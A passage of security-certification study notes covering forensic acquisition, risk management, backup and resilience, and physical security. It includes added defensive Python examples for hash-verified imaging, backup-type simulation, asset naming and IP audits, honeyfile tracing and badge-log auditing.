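CHUNK = 1024 * 1024  # read in 1 MiB blocks so large media never has to fit in RAM


def sha256_of(path):
    """Hash a file or device node block by block and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for block in iter(lambda: handle.read(CHUNK), b""):
            digest.update(block)
    return digest.hexdigest()


def bit_copy(source, destination):
    """Byte-for-byte copy; stands in for the imaging utility in this example."""
    with open(source, "rb") as src, open(destination, "wb") as dst:
        shutil.copyfileobj(src, dst, CHUNK)


def acquire(media_path, case_dir):
    """Run steps 1-4 and return the hashes to enter in the case record."""
    reference = os.path.join(case_dir, "reference.img")
    working = os.path.join(case_dir, "working.img")

    record = {"media_sha256": sha256_of(media_path)}       # step 1: hash the media
    bit_copy(media_path, reference)                        # step 2: image it
    record["reference_sha256"] = sha256_of(reference)      # step 3: hash the image
    if record["reference_sha256"] != record["media_sha256"]:
        raise ValueError("reference image does not match the source media")

    bit_copy(reference, working)                           # step 4: working copy
    record["working_sha256"] = sha256_of(working)
    if record["working_sha256"] != record["media_sha256"]:
        raise ValueError("working copy does not match the reference image")
    return record


def verify(path, expected_sha256):
    """Re-check an image against the hash recorded at acquisition time."""
    return sha256_of(path) == expected_sha256


def demo():
    """Acquire a constructed 'disk', then show that a one-bit change is detected."""
    case_dir = tempfile.mkdtemp(prefix="case-")
    try:
        media = os.path.join(case_dir, "constructed_media.bin")
        with open(media, "wb") as handle:
            handle.write(os.urandom(3 * CHUNK + 517))      # constructed sample data

        record = acquire(media, case_dir)
        working = os.path.join(case_dir, "working.img")
        intact = verify(working, record["media_sha256"])

        # Flip a single bit in the working copy to simulate tampering.
        with open(working, "r+b") as handle:
            handle.seek(1000)
            original = handle.read(1)
            handle.seek(1000)
            handle.write(bytes([original[0] ^ 0x01]))
        tamper_detected = not verify(working, record["media_sha256"])
        return record, intact, tamper_detected
    finally:
        shutil.rmtree(case_dir)


if __name__ == "__main__":
    hashes, ok_before, caught_after = demo()
    for name, value in hashes.items():
        print(f"{name}: {value}")
    print("working copy verified after acquisition:", ok_before)
    print("one-bit change detected:", caught_after)
```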

Acquisition of Other Data


● Network:
○ Packet captures and traffic flows can contain very valuable evidence, if the
capture was running at the right time and in the right place to record the
incident.
● Cache:
○ Software-based cache is stored in the file system and can be acquired as
part of a disk image.
■ For example, each browser has a cache of temporary files, and
each user profile has a cache of temp files.
● Artifacts and Data Recovery:
○ Artifacts refers to any type of data that is not part of the mainstream data
structures of an operating system.
○ For example, the Windows Alternate Data Streams (ADS) feature is
often used to conceal file data, and various caches, such as prefetch and
Amcache, can be used to find indicators of suspicious process behavior.
○ Carving: The process of extracting data from a computer when that data
has no associated file system metadata.
● Snapshot:
○ A snapshot is a live acquisition image of a persistent disk.
● Firmware:
○ Firmware is usually implemented as flash memory. Some types, such as
the PC firmware, can potentially be extracted from the device or from
system memory using an imaging utility.

Digital Forensics for Cloud


● While companies can operate private clouds, forensics in a public cloud are
complicated by the right to audit permitted to you by your service level agreement
(SLA) with the cloud provider.
● Other issues with forensics investigations of cloud-hosted processing and data
services are as follows:
○ The on-demand nature of cloud services means that instances are often
created and destroyed again, with no real opportunity for forensic recovery
of any data.
○ Chain of custody issues are complex and might have to rely on the CSP to
select and package data for you.
○ Jurisdiction and data sovereignty may restrict what evidence the CSP is
willing to release to you.
○ If the CSP is a data processor, it will be bound by data breach notification
laws and regulations.

Lesson 19: Summarizing Risk Management Concepts

Risk Management Processes


● Risk management is a process for identifying, assessing, and mitigating
vulnerabilities and threats to the essential functions that a business must perform
to serve its customers.
● You can think of this process as being performed over five phases:
○ 1. Identify mission-essential functions—mitigating risk can involve a large
amount of expenditure so it is important to focus efforts.
○ 2. Identify vulnerabilities—for each function or workflow (starting with the
most critical), analyze systems and assets to discover and list any
vulnerabilities or weaknesses to which they may be susceptible.
○ 3. Identify threats—for each function or workflow, identify the threat
sources and actors that may take advantage of or exploit or accidentally
trigger vulnerabilities.
○ 4. Analyze business impacts—the likelihood of a vulnerability being
activated as a security incident by a threat and the impact of that incident
on critical systems are the factors used to assess risk.
○ 5. Identify risk response—for each risk, identify possible countermeasures
and assess the cost of deploying additional security controls.
● Likelihood of occurrence is the probability of the threat being realized.
● Impact is the severity of the risk if realized as a security incident.
● Enterprise Risk Management (ERM): The comprehensive process of evaluating,
measuring, and mitigating the many risks that pervade an organization.

Risk Types
● External:
○ You must also consider wider threats than those of cyberattack.
○ Natural disasters, such as the COVID-19 pandemic, illustrate the need to
have IT systems and workflows that are resilient to widespread
dislocation.
● Internal:
○ When reviewing internal risks, it is important to remember that these can
be classed as malicious or accidental (non-malicious).
○ Internal threats can include contractors who were granted temporary
access.
● Multiparty:
○ Multiparty risk is where an adverse event impacts multiple organizations.
○ Multiparty risk usually arises from supplier relationships.
● Intellectual Property (IP) Theft:
○ If IP data is exfiltrated it will lose much of its commercial value.
○ Losses can be very difficult to recover in territories where there are not
strong legal protections.

Quantitative Risk Assessment


● Quantitative risk assessment aims to assign concrete values to each risk factor.
● Single Loss Expectancy (SLE)—the amount that would be lost in a single
occurrence of the risk factor.
○ This is determined by multiplying the value of the asset by an Exposure
Factor (EF).
■ The EF is the percentage of an asset's value that would be
lost during a security incident or disaster scenario.
● Annualized Loss Expectancy (ALE)—the amount that would be lost over the
course of a year.
○ This is determined by multiplying the SLE by the Annualized Rate of
Occurrence (ARO).
■ The ARO expresses the probability/likelihood of a risk as the
number of times per year a particular loss is expected to
occur.

Qualitative Risk Assessment


● Qualitative risk assessment avoids the complexity of the quantitative approach
and is focused on identifying significant risk factors.
● The qualitative approach seeks out people's opinions of which risk factors are
significant.
● Assets could be categorized as Irreplaceable, High Value, Medium Value, and
Low Value; risks could be categorized as one-off or recurring and as Critical,
High, Medium, and Low probability.

Risk Management Strategies


● The result of a quantitative or qualitative analysis is a measure of inherent risk.
● Inherent risk is the level of risk before any type of mitigation has been
attempted.
● It is not possible to eliminate risk; rather the aim is to mitigate risk factors to the
point where the organization is exposed only to a level of risk that it can afford.
● The overall status of risk management is referred to as risk posture.
● Risk mitigation (or remediation) is the overall process of reducing exposure to
or the effects of risk factors.
● If you deploy a countermeasure that reduces exposure to a threat or vulnerability,
that is risk deterrence (or reduction).
○ Risk reduction refers to controls that can either make a risk incident less
likely or less costly (or perhaps both).

Risk Avoidance and Risk Transference


● Avoidance means that you stop doing the activity that is risk-bearing.
● Transference (or sharing) means assigning risk to a third party, such as an
insurance company or a contract with a supplier that defines liabilities.

Risk Acceptance and Risk Appetite


● Risk Acceptance:
○ Risk acceptance (or tolerance) means that no countermeasures are put
in place either because the level of risk does not justify the cost or
because there will be unavoidable delay before the countermeasures are
deployed.
● Residual Risk and Risk Appetite:
○ Residual Risk: Risk that remains even after controls are put into place.
○ Risk appetite is a strategic assessment of what level of residual risk is
tolerable.
● Control Risk:
○ Control risk is a measure of how much less effective a security control
has become over time.
○ For example, antivirus became quite capable of detecting malware on the
basis of signatures, but then less effective as threat actors started to
obfuscate code.

Risk Awareness
● To ensure that the business stakeholders understand each risk scenario, you
should articulate it such that the cause and effect can clearly be understood by
the owner of the asset.
● A risk register is a document showing the results of risk assessments in a
comprehensible format.
● The register may resemble the heat map risk matrix shown earlier with columns
for impact and likelihood ratings, date of identification, description,
countermeasures, owner/route for escalation, and status.

Business Impact Analysis


● Business impact analysis (BIA) is the process of assessing what losses might
occur for a range of threat scenarios.
● Where BIA identifies risks, business continuity planning (BCP) identifies controls
and processes that enable an organization to maintain critical workflows in the
face of some adverse event.

Mission Essential Functions


● A mission essential function is a business or organizational activity that is too
critical to be deferred for anything more than a few hours, if at all.
● Maximum tolerable downtime (MTD) is the longest period of time that a
business function outage may occur for without causing irrecoverable business
failure.
● Recovery time objective (RTO) is the period following a disaster that an
individual IT system may remain offline.
○ This represents the amount of time it takes to identify that there is a
problem and then perform recovery.
● Work Recovery Time (WRT). Following systems recovery, there may be
additional work to reintegrate different systems, test overall functionality, and
brief system users on any changes or different working practices so that the
business function is again fully supported.

Identification of Critical Systems
● To support the resiliency of mission essential and primary business functions, it
is crucial to perform an identification of critical systems.
● This means compiling an inventory of business processes and the assets that
support them.
● Asset Types include:

Single Points of Failure


● Single Point of Failure (SPoF): A component or system that would cause a
complete interruption of a service if it failed.
○ A SPoF is an asset that causes the entire workflow to fail if it is damaged
or otherwise not available.
● Mean Time Between Failures (MTBF): Metric for a device or component that
predicts the expected time between failures.
○ The calculation for MTBF is the total operational time divided by the
number of failures.
○ For example, if you have 10 appliances that run for 50 hours and two of
them fail, the MTBF is (10*50)/2 = 250 hours/failure.
● Mean Time to Failure (MTTF): Metric indicating average time a device or
component is expected to be in operation.
● MTTF/MTBF: used to determine the amount of asset redundancy a system
should have.
○ A redundant system can fail over to another asset if there is a fault and
continue to operate normally. MTTF/MTBF can also be used to work out how
likely failures are to occur.
● Mean Time to Repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation.

Disasters
● Site Risk Assessment:
○ A site risk assessment evaluates exposure to the following types of factors:
■ Risk from disaster events, such as earthquake, flood, and fire.
These events can occur naturally or from person-made causes.
■ Risk from disruption to utilities, such as electricity, water, and
transportation. These risks are higher in geographically isolated
sites.
■ Risk to health and safety from on-premises electromechanical
systems or chemicals.

Disaster Recovery Plans


● A disaster recovery plan (DRP) is a documented and resourced plan showing
actions and responsibilities to be used in response to critical incidents.
● The DRP should accomplish the following:
○ 1. Identify scenarios for natural and non-natural disaster and options for
protecting systems.
○ 2. Identify tasks, resources, and responsibilities for responding to a
disaster.
○ 3. Train staff in the disaster planning procedures and how to react well to
change.

Functional Recovery Plans


● Because disasters are extreme and (hopefully) rare events, it is very difficult to
evaluate how effective or functional a recovery plan is.
● There are four principal methods for assessing the functionality of recovery
plans:
○ Walk-throughs, workshops, and orientation seminars—often used to
provide basic awareness and training for disaster recovery team
members, these exercises describe the contents of DRPs, and other
plans, and the roles and responsibilities outlined in those plans.
○ Tabletop exercises—staff "ghost" the same procedures as they would in a
disaster, without actually creating disaster conditions or applying or
changing anything.
○ Functional exercises—action-based sessions where employees can
validate DRPs by performing scenario-based activities in a simulated
environment.
○ Full-scale exercises—action-based sessions that reflect real situations,
these exercises are held onsite and use real equipment and real
personnel as much as possible.

Lesson 20: Implementing Cybersecurity Resilience

High Availability
● High availability is the property that defines how closely systems approach the
goal of providing data availability 100 percent of the time while maintaining a
high level of system performance.
● Scalability and Elasticity:
○ Scalability is the capacity to increase resources to meet demand within
similar cost ratios.
■ This means that if service demand doubles, costs do not more than
double.
■ There are two types of scalability:
● To scale out is to add more resources in parallel with
existing resources.
● To scale up is to increase the power of existing resources.
● Fault Tolerance and Redundancy:
○ A system that can experience failures and continue to provide the same
(or nearly the same) level of service is said to be fault tolerant.
○ Fault tolerance is often achieved by provisioning redundancy for critical
components and single points of failure.
■ A redundant component is one that is not essential to the normal
function of a system but that allows the system to recover from the
failure of another component.

Power Redundancy
● Dual Power Supplies:
○ An enterprise-class server or appliance enclosure is likely to feature two or
more power supply units (PSUs) for redundancy.
● Managed Power Distribution Units (PDUs):
○ Advanced strip socket that provides filtered output voltage. A managed
unit supports remote administration.
○ These come with circuitry to "clean" the power signal, provide protection
against spikes, surges, and brownouts, and can integrate with
uninterruptible power supplies (UPSs).
● Battery Backups and Uninterruptible Power Supplies (UPSs):
○ A battery-powered device that supplies AC power that an electronic device
can use in the event of power failure.
● Generators:
○ A backup power generator can provide power to the whole building,
often for several days.

Network Redundancy
● Network Interface Card (NIC) Teaming:
○ Network interface card (NIC) teaming, or adapter teaming, means that the
server is installed with multiple NICs, or NICs with multiple ports, or both.
○ If there is a problem with one cable, or one NIC, the network connection
will continue to work, though at just 3 Gb.
● Switching and Routing:
○ Network cabling should be designed to allow for multiple paths between
the various switches and routers, so that during a failure of one part of the
network, the rest remains operational.
● Load Balancers:
○ NIC teaming provides load balancing at the adapter level. Load balancing
and clustering can also be provisioned at a service level:
■ A load balancing switch distributes workloads between available
servers.
■ A load balancing cluster enables multiple redundant servers to
share data and session information to maintain a consistent service
if there is failover from one server to another.

Disk Redundancy
● Disk redundancy ensures that a server can continue to operate if one, or possibly
more, storage devices fail.
● Redundant Array of Independent Disks (RAID):
○ Specifications that support redundancy and fault tolerance for different
configurations of multiple-device storage systems.
● Multipath:
○ Overprovisioning controllers and cabling so that a host has failover
connections to storage media.

Geographical Redundancy and Replication


● Data replication is technology that maintains exact copies of data at more than
one location.
● RAID mirroring and parity implement types of replication between local storage
devices.
● Data replication can be applied in many other contexts:
○ Storage Area Network (SAN)—most enterprise storage is configured as a
SAN.
■ A SAN is a high-speed fiber optic network of storage devices built
from technologies such as Fibre Channel, Small Computer System
Interface (SCSI), or Infiniband.
○ Database—much data is stored within a database. Where a database is
replicated between multiple servers or sites, it is very important to
maintain consistency between the replicas.
○ Virtual Machine (VM)—the same VM instance may need to be deployed in
multiple locations. This can be achieved by replicating the VM's disk
image and configuration settings.
● Geographical Dispersal:
○ Geographical dispersal refers to replicating data between hot and warm sites
that are physically distant from one another.
○ This means that data is protected against a natural disaster wiping out
storage at one of the sites.
● Asynchronous and Synchronous Replication:
○ Synchronous replication is designed to write data to all replicas
simultaneously.
■ Therefore, all replicas should always have the same data all of the
time.
○ Asynchronous replication writes data to the primary storage first, and then
copies data to the replicas at scheduled intervals.

Backups and Retention Policy


● Data retention needs to be considered in the short and long term:
○ In the short term, files that change frequently might need retaining for
version control.
■ Short-term retention is also important in recovering from malware
infection.
○ In the long term, data may need to be stored to meet legal requirements or
to comply with company policies or industry standards.

Backup Types
● When considering a backup made against an original copy of data, the backup
can usually be performed using one of three main types: full, incremental, and
differential.
● In Windows, a full backup includes all selected files and directories while
incremental and differential backups check the status of the archive attribute
before including a file. The archive attribute is set whenever a file is modified.
● Incremental Backup:
○ A backup type in which all selected files that have changed since the last
full or incremental backup (whichever was most recent) are backed up.
● Differential Backup:
○ A backup type in which all selected files that have changed since the last
full backup are backed up.
● Copy Backups:
○ Most software also has the capability to do copy backups. These are
made outside the media rotation system and do not affect the archive
attribute.
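
An added example (not part of the original notes) that simulates the archive attribute to show how the backup types select files. It assumes the standard behaviour that full and incremental jobs clear the attribute while differential and copy jobs leave it set; the file names and the weekly schedule are constructed.

```python
class Volume:
    """Tracks only the archive attribute of each file on a simulated volume."""

    def __init__(self, names):
        # New files have never been backed up, so their archive attribute is set.
        self.archive = {name: True for name in names}

    def modify(self, *names):
        """Modifying (or creating) a file sets its archive attribute."""
        for name in names:
            self.archive[name] = True

    def backup(self, kind):
        """Return the sorted list of files the job would include."""
        if kind in ("full", "copy"):
            selected = sorted(self.archive)                  # everything selected
        elif kind in ("incremental", "differential"):
            selected = sorted(n for n, flag in self.archive.items() if flag)
        else:
            raise ValueError(f"unknown backup type: {kind}")
        if kind in ("full", "incremental"):
            for name in selected:
                self.archive[name] = False                   # attribute cleared
        return selected                                      # differential/copy: untouched


# Constructed schedule: which files change before each nightly job.
CHANGES = [
    ("Tue", ["budget.xlsx"]),
    ("Wed", ["hr.docx"]),
    ("Thu", ["budget.xlsx", "new.txt"]),
]


def run_week(kind):
    """Full backup on Monday, then a backup of `kind` on each following day."""
    volume = Volume(["budget.xlsx", "hr.docx", "notes.txt", "plan.pptx"])
    jobs = [("Mon", "full", volume.backup("full"))]
    for day, names in CHANGES:
        volume.modify(*names)
        jobs.append((day, kind, volume.backup(kind)))
    return jobs


def restore_set(jobs):
    """Jobs needed to restore the latest state.

    Assumes one kind of job follows the full backup: every incremental is
    needed in order, but only the most recent differential.
    """
    last_full = max(i for i, job in enumerate(jobs) if job[1] == "full")
    later = jobs[last_full + 1:]
    needed = [jobs[last_full][0]]
    needed += [day for day, kind, _ in later if kind == "incremental"]
    differentials = [day for day, kind, _ in later if kind == "differential"]
    if differentials:
        needed.append(differentials[-1])
    return needed


if __name__ == "__main__":
    for kind in ("incremental", "differential"):
        week = run_week(kind)
        print(kind)
        for day, job_kind, files in week:
            print(f"  {day} {job_kind:12} {files}")
        print("  restore needs:", restore_set(week))
```

The incremental jobs stay small but all of them are needed for a restore; the differential jobs grow each day but only the last one is needed alongside the full backup.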

Snapshot and Images


● A snapshot is a point-in-time copy of data maintained by the file system.
● In Windows, snapshots are provided on NTFS volumes by the Volume
Shadow Copy Service (VSS).
○ VSS makes snapshot backups of files even if they are open. It is used for
Windows backup and the System Restore and Previous Versions
features.
● Images:
○ An image backup is made by duplicating an OS installation.
○ A duplicate of an operating system installation (including installed
software, settings, and any user data) stored on removable media.

Backup Storage Issues


● Offsite Storage:
○ Distance consideration is a calculation of how far offsite the backup needs
to be kept, given different disaster scenarios.
○ On the one hand, the media must be kept far away enough not to be
damaged by the disaster; on the other, media access should not slow
down a recovery operation too much.
● Online versus Offline Backups:
○ An online backup system is instantly available to perform a backup or
restore operation without an administrator having to transport and connect
a device or load some backup media.
○ An offline backup is disconnected from the host and must be connected
manually.
○ An online system is faster, but an offline backup offers better security.
Consider the case of crypto ransomware, for instance.

Backup Media Types


● Disk:
○ Individual removable hard drives are an excellent low-cost option for small
office/home office (SOHO) network backups, but they do not have
sufficient capacity or flexibility to be used within an automated enterprise
backup solution.
● Network Attached Storage (NAS):
○ A storage device with an embedded OS that supports typical network file
access protocols (TCP/IP and SMB for instance).
○ A NAS appliance is accessed via an IP address and backup takes place at
file-level.
● Tape:
○ Digital tape systems are a popular choice for institutions with
multi-terabyte storage requirements.
○ Tape media provides robust, high-capacity backup storage. Tape drives
and autoloader libraries can be connected to the SATA and SAS buses or
accessed via a SAN.
○ The main drawback of tape is that it is slow, compared to disk-based
solutions, especially for restore operations.
● Storage Area Network (SAN) and Cloud:
○ A RAID array or tape drive/autoloader can be provisioned as direct
attached storage, where a server hosts the backup devices, usually over
serial attached SCSI (SAS).
○ Storage Area Networks (SAN): A network dedicated to data storage,
typically consisting of storage devices and servers connected to switches
via host bus adapters.

Restoration Order
● Restoration order is a concept that dictates the sequence in which systems must
be brought back online during disaster recovery.
● In very general terms, the order of restoration will be as follows:
○ Enable and test power delivery systems (grid power, power distribution
units [PDUs], UPS, secondary generators, and so on).
○ Enable and test switch infrastructure, then routing appliances and
systems.
○ Enable and test network security appliances (firewalls, IDS, proxies).
○ Enable and test critical network servers (DHCP, DNS, NTP, and directory
services).
○ Enable and test back-end and middleware (databases and business
logic). Verify data integrity.
○ Enable and test front-end applications.
○ Enable client workstations and devices and client browser access.

Non Persistence
● Nonpersistence: This refers to a setup where changes made to a
computing environment, like a virtual machine, are not permanent. Instead, the
system is restored to a known state, ensuring that any malware or backdoors are
removed when the environment is recreated.
● Mechanisms for Nonpersistence:
○ Snapshot/Revert: Saving a system state that can be applied later to reset
the instance.
○ Rollback: Restoring the baseline system configuration, similar to Windows
System Restore.
○ Live Boot Media: Booting from read-only storage to memory, avoiding
changes to the local disk.
● Mastering Instructions:
○ Master Image: A complete, pre-configured server instance known as the
"gold" copy.
○ Automated Build from Template: Instructions for building and provisioning
an instance rather than storing a complete copy.
● Configuration Validation: Ensuring that a recovery solution is functioning
properly across various layers (hardware, network, data, and application) by
monitoring key indicators like recovery time and data replication.

Configuration Management
● Configuration management ensures that each component of ICT infrastructure
is in a trusted state that has not diverged from its documented properties.
● Change control and change management reduce the risk that changes to
these components could cause service disruption.

Asset Management
● An asset management process tracks all the organization's critical systems,
components, devices, and other objects of value in an inventory.
● It also involves collecting and analyzing information about these assets so that
personnel can make more informed changes or otherwise work with assets to
achieve business goals.
● Asset Identification and Standard Naming Conventions:
○ Tangible assets can be identified using a barcode label or radio frequency
ID (RFID) tag attached to the device (or more simply, using an
identification number).
○ An RFID tag is a chip programmed with asset data.
■ When in range of a scanner, the chip activates and signals the
scanner.
■ The scanner alerts management software to update the device's
location. As well as supporting asset tracking, this lets the
management software track where the device is, making theft more
difficult.
○ A standard naming convention for hardware assets, and for digital
assets such as accounts and virtual machines, makes the environment
more consistent.
■ Applying consistent names and labels to assets and digital
resources/identities within a configuration management system.
● Internet Protocol (IP) Schema:
○ The division of the IP address space into subnets should be carefully
planned and documented in an Internet Protocol (IP) schema.
○ IP Address Management (IPAM): Software consolidating management of
multiple DHCP and DNS services to provide oversight into IP address
allocation across an enterprise network.
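
A check that ties the standard naming convention and the documented IP schema together, as an added example that is not part of the original notes. The `<site>-<role>-<nn>` convention, the subnets, and the inventory records are all assumptions constructed for illustration.

```python
import ipaddress
import re

# Hypothetical naming convention: <site>-<role>-<nn>, for example "lon-web-01".
NAME_RE = re.compile(r"^(?P<site>[a-z]{3})-(?P<role>[a-z]+)-(?P<seq>\d{2})$")

# Hypothetical documented IP schema: one subnet per (site, role).
IP_SCHEMA = {
    ("lon", "web"): ipaddress.ip_network("10.10.20.0/24"),
    ("lon", "db"): ipaddress.ip_network("10.10.30.0/24"),
    ("nyc", "web"): ipaddress.ip_network("10.20.20.0/24"),
}

# Constructed inventory records: (asset name, assigned address).
INVENTORY = [
    ("lon-web-01", "10.10.20.11"),
    ("lon-db-01", "10.10.20.12"),   # database host placed in the web subnet
    ("NYC_WEB1", "10.20.20.5"),     # name breaks the convention
    ("nyc-web-02", "10.20.20.5"),   # address already allocated
    ("lon-app-01", "10.10.40.7"),   # role missing from the schema
]


def audit(inventory, schema=IP_SCHEMA):
    """Return (asset, finding) pairs for records that break the convention or schema."""
    findings, seen = [], {}
    for name, addr in inventory:
        ip = ipaddress.ip_address(addr)
        if ip in seen:
            findings.append((name, f"duplicate address, also held by {seen[ip]}"))
        seen.setdefault(ip, name)
        match = NAME_RE.match(name)
        if not match:
            findings.append((name, "name does not follow the convention"))
            continue
        subnet = schema.get((match["site"], match["role"]))
        if subnet is None:
            findings.append((name, "no subnet documented for this site and role"))
        elif ip not in subnet:
            findings.append((name, f"address outside documented subnet {subnet}"))
    return findings


if __name__ == "__main__":
    for asset, finding in audit(INVENTORY):
        print(f"{asset}: {finding}")
```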

Change Control and Change Management


● Service management standards distinguish change control as distinct procedures
for requesting and approving changes within an overall change management
process.
● Change Control:
○ A change control process can be used to request and approve changes in
a planned and controlled way.
○ Change requests are usually generated when something needs to be
corrected, when something changes, or when there is room for
improvement in a process or system currently in place.
○ The need to change is often described either as reactive, where the
change is forced on the organization, or as proactive, where the need for
change is initiated internally.
● Change Management:
○ The implementation of changes should be carefully planned, with
consideration for how the change will affect dependent components.
○ For most significant or major changes, organizations should attempt to
trial the change first.

Site Resiliency
● Site resiliency is described as hot, warm, or cold.
● A hot site can fail over almost immediately.
○ It generally means that the site is already within the organization's
ownership and is ready to deploy.
○ For example, a hot site could consist of a building with operational
computer equipment that is kept updated with a live data set.
● A warm site could be similar, but with the requirement that the latest data set will
need to be loaded.
○ A location that is dormant or performs noncritical functions under normal
conditions, but which can be rapidly converted to a key operations site if
needed.
● A cold site takes longer to set up. A cold site may be an empty building with a
lease agreement in place to install whatever equipment is required when
necessary.

Diversity and Defense in Depth


● Layered security is typically seen as improving cybersecurity resiliency because
it provides defense in depth.
○ These layers reduce the potential attack surface and make it much more
likely that an attack will be deterred or prevented, or at least detected and
then prevented by manual intervention.
● Technology and Control Diversity:
○ Diversity: Cybersecurity resilience strategy that increases attack costs by
provisioning multiple types of controls, technologies, vendors, and crypto
implementations.
○ Technology diversity refers to environments that are a mix of operating
systems, applications, coding languages, virtualization solutions, and so
on.
○ Control diversity means that the layers of controls should combine
different classes of technical and administrative controls with the range of
control functions: prevent, detect, correct, and deter.
● Vendor Diversity:
○ Vendor diversity means that security controls are sourced from multiple
suppliers.
● Crypto Diversity:
○ This concept can be extended to the selection of algorithms and
implementations of cryptography.

Deception and Disruption Strategies


● Active defense means an engagement with the adversary, but this can be
interpreted in several different ways.
● Honeypots, Honeynets, and Honey Files:
○ A honeynet is an entire decoy network. This may be set up as an actual
network or simulated using an emulator.
○ On a production network, a honeypot is more likely to be located in a
DMZ, or on an isolated segment on the private network (if the honeypot is
seeking to draw out insider threats).
○ A honeypot or honeynet can be combined with the concept of a honeyfile,
which is convincingly useful, but actually fake, data.
■ This honeyfile can be made trackable, so that when a threat actor
successfully exfiltrates it, the attempts to reuse or exploit it can be
traced.
● Disruption Strategies:
○ These adopt some of the obfuscation strategies used by malicious actors.
○ The aim is to raise the attack cost and tie up the adversary's resources.
Some examples of disruption strategies include:
■ Using bogus DNS entries to list multiple hosts that do not exist.
■ Configuring a web server with multiple decoy directories or
dynamically generated pages to slow down scanning.
■ Using port triggering or spoofing to return fake telemetry data
when a host detects port scanning activity.
● This will result in multiple ports being falsely reported as
open and will slow down the scan.
■ Using a DNS sinkhole to route suspect traffic to a different
network, such as a honeynet, where it can be analyzed.
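
One way to make a honeyfile trackable, shown as an added example that is not part of the original notes: each planted copy carries a decoy account name with a marker derived from where it was planted, so a later attempt to use that account in a log identifies which decoy was taken. The key, placements, account prefix, and log lines are constructed assumptions.

```python
import hashlib
import hmac
import re

SECRET = b"constructed-demo-key"  # assumption: the real key is stored away from decoy hosts

# Constructed placements: where each copy of the honeyfile is planted.
PLACEMENTS = ["dmz-files:/srv/share/backup.ini", "hr-pc-07:/Users/Public/backup.ini"]


def make_token(placement):
    """Derive a marker unique to one placement; it cannot be guessed without SECRET."""
    return hmac.new(SECRET, placement.encode(), hashlib.sha256).hexdigest()[:16]


def build_honeyfile(placement):
    """Plausible-looking but fake credentials; the account name carries the marker."""
    return (f"[backup]\nuser = svc-bkp-{make_token(placement)}\n"
            "password = not-a-real-secret\n")


def trace(log_lines, placements):
    """Return (placement, log line) for each line that reuses an issued marker."""
    registry = {make_token(p): p for p in placements}
    hits = []
    for line in log_lines:
        for token in re.findall(r"svc-bkp-([0-9a-f]{16})\b", line):
            if token in registry:
                hits.append((registry[token], line))
    return hits


# Constructed authentication log lines; the last one is a lookalike never issued.
LOGS = [
    "2024-05-02T09:14:03Z vpn auth-fail user=alice src=198.51.100.7",
    f"2024-05-02T09:15:41Z vpn auth-fail user=svc-bkp-{make_token(PLACEMENTS[1])} src=203.0.113.9",
    "2024-05-02T09:16:02Z vpn auth-fail user=svc-bkp-0123456789abcdef src=203.0.113.9",
]

if __name__ == "__main__":
    for placement, line in trace(LOGS, PLACEMENTS):
        print(f"decoy credential from {placement} reused: {line}")
```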

Lesson 21: Explaining Physical Security

Physical Security Controls


● Physical access controls are security measures that restrict and monitor
access to specific physical areas or assets.
● Physical access controls depend on the same access control fundamentals as
network or operating system security:
○ Authentication—create access lists and identification mechanisms to allow
approved persons through the barriers.
○ Authorization—create barriers around a resource so that access can be
controlled through defined entry and exit points.
○ Accounting—keep a record of when entry/exit points are used and detect
security breaches.
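
The accounting function above, as an added example that is not part of the original notes: replaying entry/exit records to find badge activity that does not add up. The record layout, badge IDs, and events are constructed for illustration.

```python
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed badge-reader records: (timestamp, badge ID, gateway, direction).
EVENTS = [
    ("2024-03-04 08:01:10", "B100", "lobby", "in"),
    ("2024-03-04 08:01:12", "B200", "lobby", "in"),
    ("2024-03-04 12:30:00", "B300", "lobby", "out"),  # no entry was recorded
    ("2024-03-04 12:45:00", "B100", "lobby", "in"),   # second entry, no exit between
    ("2024-03-04 17:00:00", "B200", "lobby", "out"),
]


def audit_badges(events):
    """Replay events in time order; return (findings, badges still inside)."""
    inside, findings = set(), []
    for ts, badge, gate, direction in sorted(
            events, key=lambda e: datetime.strptime(e[0], FMT)):
        if direction == "in":
            if badge in inside:
                # The badge never left: an unlogged exit or a shared badge.
                findings.append((ts, badge, gate, "entry while already inside"))
            inside.add(badge)
        else:
            if badge not in inside:
                # Someone got in without their badge being read.
                findings.append((ts, badge, gate, "exit without recorded entry"))
            inside.discard(badge)
    return findings, sorted(inside)


if __name__ == "__main__":
    issues, still_inside = audit_badges(EVENTS)
    for issue in issues:
        print(issue)
    print("still inside at end of log:", still_inside)
```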

Site Layout, Fencing, and Lighting


● Try to plan the site using the following principles:
○ Locate secure zones, such as equipment rooms, as deep within the
building as possible, avoiding external walls, doors, and windows.
○ Use a demilitarized zone (DMZ) design for the physical space.
■ Position public access areas so that guests do not pass near
secure zones.
○ Use signage and warnings to enforce the idea that security is tightly
controlled.
○ Conversely, entry points to secure zones should be discreet.
■ Use industrial camouflage to make buildings and gateways
protecting high-value assets unobtrusive, or create high-visibility
decoy areas to draw out potential threat actors.
○ Try to minimize traffic having to pass between zones. The flow of people
should be "in and out" rather than "across and between."
○ Give high-traffic public areas high visibility, so that covert use of gateways,
network access ports, and computer equipment is hindered, and
surveillance is simplified.
○ In secure zones, do not position display screens or input devices facing
toward pathways or windows. Alternatively, use one-way glass so that no
one can look in through windows.
● Barricades and Entry/Exit Points:
○ A barricade is something that prevents access. As with any security
system, no barricade is completely effective.
● Fencing:
○ The exterior of a building may be protected by fencing.
● Lighting:
○ Security lighting is enormously important in contributing to the perception
that a building is safe and secure at night.

Gateways and Locks


● Physical—a conventional lock prevents the door handle from being operated
without the use of a key. More expensive types offer greater resistance against
lock picking.
● Electronic—rather than a key, the lock is operated by entering a PIN on an
electronic keypad. This type of lock is also referred to as cipher, combination, or
keyless.
○ A smart lock may be opened using a magnetic swipe card or feature a
proximity reader to detect the presence of a physical token, such as a
wireless key fob or smart card.
● Mantraps:
○ The risk that several people pass through a gateway together may be
mitigated by installing a turnstile (a type of gateway that only allows
one person through at a time).
○ A mantrap is where one gateway leads to an enclosed space protected
by another barrier.
● Cable Locks:
○ Devices can be physically secured against theft using cable ties and
padlocks.

Physical Attacks Against Smart Cards and USB


● Some types of smart cards used as passkeys for electronic locks can be
vulnerable to cloning and skimming attacks:
○ Card cloning—this refers to making one or more copies of an existing
card.
■ A lost or stolen card with no cryptographic protections can be
physically duplicated.
○ Skimming—this refers to using a counterfeit card reader to capture card
details, which are then used to program a duplicate.
■ Some types of proximity cards can quite easily be made to transmit
the credential to a portable RFID reader that a threat actor could
conceal on his or her person.
